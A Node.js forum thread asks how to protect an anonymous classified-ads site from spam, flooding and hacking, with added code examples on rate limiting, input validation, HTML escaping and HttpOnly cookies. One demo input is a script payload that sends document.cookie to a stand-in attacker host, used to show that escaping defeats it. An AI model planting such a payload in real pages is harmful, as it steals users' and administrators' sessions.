Node.js
Eugene, 2020-10-16 14:04:14

How to protect your site from bots and hacks?

Hello. Help with a task.
There is a site where users can post ads for the sale of their goods.
We want to make it possible for them to publish without registration and authorization.
How to protect the site from spam and all kinds of attacks? Let's say we use recaptcha and track a large number of requests per minute. If a user makes more than 100 posts per minute, we block it. Is this enough or am I missing something? Thanks for the detailed answer.
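The rate-limiting rule the question describes ("more than N posts per minute, block the client") as an added Node.js example; this is not code from the original question or any of the answers. It assumes the limiter is keyed by client IP (or by the captcha-validated local ID suggested in one answer), and the limit, window and block duration are assumptions chosen for the demo.

```javascript
'use strict';

// Per-client sliding-window limiter: at most `limit` events per `windowMs`;
// a client that exceeds it is refused for `blockMs`. `now` is injectable so
// the behaviour can be checked without waiting on the wall clock.
class SlidingWindowLimiter {
  constructor({ limit = 100, windowMs = 60_000, blockMs = 10 * 60_000, now = Date.now } = {}) {
    this.limit = limit;
    this.windowMs = windowMs;
    this.blockMs = blockMs;
    this.now = now;
    this.events = new Map();       // key -> timestamps (ms) of recent events
    this.blockedUntil = new Map(); // key -> time (ms) until which the key is blocked
  }

  // Records one event for `key` and says whether it is allowed.
  hit(key) {
    const t = this.now();
    const until = this.blockedUntil.get(key);
    if (until !== undefined) {
      if (t < until) return { allowed: false, remaining: 0, retryAfterMs: until - t };
      this.blockedUntil.delete(key); // block expired: start with a clean window
      this.events.delete(key);
    }
    const cutoff = t - this.windowMs;
    const stamps = (this.events.get(key) || []).filter((s) => s > cutoff);
    if (stamps.length >= this.limit) {
      this.blockedUntil.set(key, t + this.blockMs);
      this.events.delete(key);
      return { allowed: false, remaining: 0, retryAfterMs: this.blockMs };
    }
    stamps.push(t);
    this.events.set(key, stamps);
    return { allowed: true, remaining: this.limit - stamps.length, retryAfterMs: 0 };
  }
}

// Express-style middleware wrapper (assumed usage; Express is not required to run this file).
// Use the real client address behind a proxy (trust proxy / X-Forwarded-For), otherwise
// every visitor shares the proxy's IP and one spammer blocks everyone.
function rateLimitMiddleware(limiter, keyFn = (req) => req.ip) {
  return (req, res, next) => {
    const r = limiter.hit(keyFn(req));
    if (!r.allowed) {
      res.statusCode = 429;
      res.setHeader('Retry-After', String(Math.ceil(r.retryAfterMs / 1000)));
      res.end('Too many requests');
      return;
    }
    next();
  };
}

// Constructed demo: 3 posts per 60 s from one (documentation-range) IP. The 4th post
// is refused and the client stays blocked for 120 s, after which posting works again.
function demo() {
  let clock = 0;
  const limiter = new SlidingWindowLimiter({ limit: 3, windowMs: 60_000, blockMs: 120_000, now: () => clock });
  const results = [];
  for (let i = 0; i < 4; i++) {
    results.push(limiter.hit('203.0.113.5').allowed);
    clock += 1000;
  }
  clock += 120_000; // block has expired
  results.push(limiter.hit('203.0.113.5').allowed);
  return results; // [true, true, true, false, true]
}
```

The limiter keeps state in process memory, so with several Node.js workers each one counts separately; a shared store (the "datastorage" one answer mentions) is needed for a consistent count across instances. Rate limiting complements the captcha rather than replacing it: the captcha raises the cost of each post, the limiter caps how many a single client can make once it has paid that cost.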


3 answer(s)
xmoonlight, 2020-10-16
@toohappy

1. You can do it: captcha + local ID = login + pass + random + timestamp, with storage in a data store (it can be created at any time, even without user participation).
But moments arise: the phone is without confirmation => the phone will be indicated by someone else just so that someone is constantly spammed with calls => the site will be closed quickly due to complaints.
2. About the rest, in terms of security, this is setting up firewall rules and web server rules.

Vladimir Korotenko, 2020-10-16
@firedragon

Without registration, this is shit and not a client. Sorry for the vocabulary. The woodpecker is not a client at all. A spammer is also not a client. And in the end you will weed out 80%.

MrGroovy, 2020-12-21
@MrGroovy

> We want to make it possible for them to publish without registration and authorization.

If you are going to make a bulletin board without registration, then you will have to face not only spam, but also flooding.
You need a captcha and detailed customization of user input (for example, limiting an ad to 450 characters).

> If a user makes more than 100 posts per minute, we block it. Is this enough or am I missing something?

You miss the possibility that your site can be hacked. For example, through XSS vulnerabilities an attacker will steal the administrator's session cookie. You can check for vulnerabilities with special scanners such as Legion, OWASP ZAP or Sparta. Of the online options, special resources are suitable: vulnerability scanners that can check most vulnerabilities at each level, such as https://metascan.ru or https://detectify.com/. They will show XSS vulnerabilities, the possibility of SQL injection and network stack vulnerabilities.
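The two defences this answer points at, a length cap on user input (its figure of 450 characters) and protection against XSS stealing the administrator's session cookie, as an added Node.js example. This is not the answer's own code; the field names, the title limit, the cookie name and path are assumptions.

```javascript
'use strict';

const MAX_AD_LENGTH = 450; // figure suggested in the answer
const MAX_TITLE_LENGTH = 80; // assumed

// Escape the characters that matter in HTML text and attribute context, so an ad
// body like "<script>…</script>" is displayed as text instead of executed when an
// administrator (or anyone else) views it.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Server-side validation of an untrusted submission (the client-side form is not
// a control; a bot posts straight to the endpoint). Returns { ok, ad } or { ok, errors }.
function validateAd(input) {
  const errors = [];
  const title = typeof input.title === 'string' ? input.title.trim() : '';
  const body = typeof input.body === 'string' ? input.body.trim() : '';
  if (title.length === 0 || title.length > MAX_TITLE_LENGTH) {
    errors.push(`title must be 1-${MAX_TITLE_LENGTH} characters`);
  }
  if (body.length === 0 || body.length > MAX_AD_LENGTH) {
    errors.push(`body must be 1-${MAX_AD_LENGTH} characters`);
  }
  // Control characters other than tab/newline are never legitimate in an ad.
  if (/[\u0000-\u0008\u000B\u000C\u000E-\u001F\u007F]/.test(title + body)) {
    errors.push('control characters are not allowed');
  }
  return errors.length ? { ok: false, errors } : { ok: true, ad: { title, body } };
}

// Render an ad as an HTML fragment with every user-controlled value escaped.
// Escaping happens at output time, in the context (HTML text) where the value lands.
function renderAd(ad) {
  const body = escapeHtml(ad.body).replace(/\n/g, '<br>');
  return `<article class="ad"><h2>${escapeHtml(ad.title)}</h2><p>${body}</p></article>`;
}

// Set-Cookie value for the administrator session. HttpOnly keeps page script from
// reading the cookie even if an XSS does slip through; Secure and SameSite=Strict
// keep it off plain HTTP and out of cross-site requests. The id format is assumed.
function adminSessionCookie(sessionId) {
  if (!/^[A-Za-z0-9_-]{32,}$/.test(sessionId)) throw new Error('unexpected session id format');
  return `admin_session=${sessionId}; Path=/admin; HttpOnly; Secure; SameSite=Strict; Max-Age=3600`;
}

// Constructed demo: a malicious submission is accepted as text but rendered harmlessly.
function demo() {
  const submission = { title: 'Bike for sale', body: '<script>document.location="https://attacker.invalid/?c="+document.cookie</script>' };
  const v = validateAd(submission);
  return v.ok ? renderAd(v.ad) : v.errors;
}
```

Rendering through a template engine that escapes by default (most Node.js engines do) achieves the same as `renderAd`; the point is that escaping is applied at every output site and that the cookie carries `HttpOnly`, so a successful XSS cannot simply read it. A scanner such as OWASP ZAP, as the answer suggests, is a reasonable way to confirm that no unescaped output path was missed.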
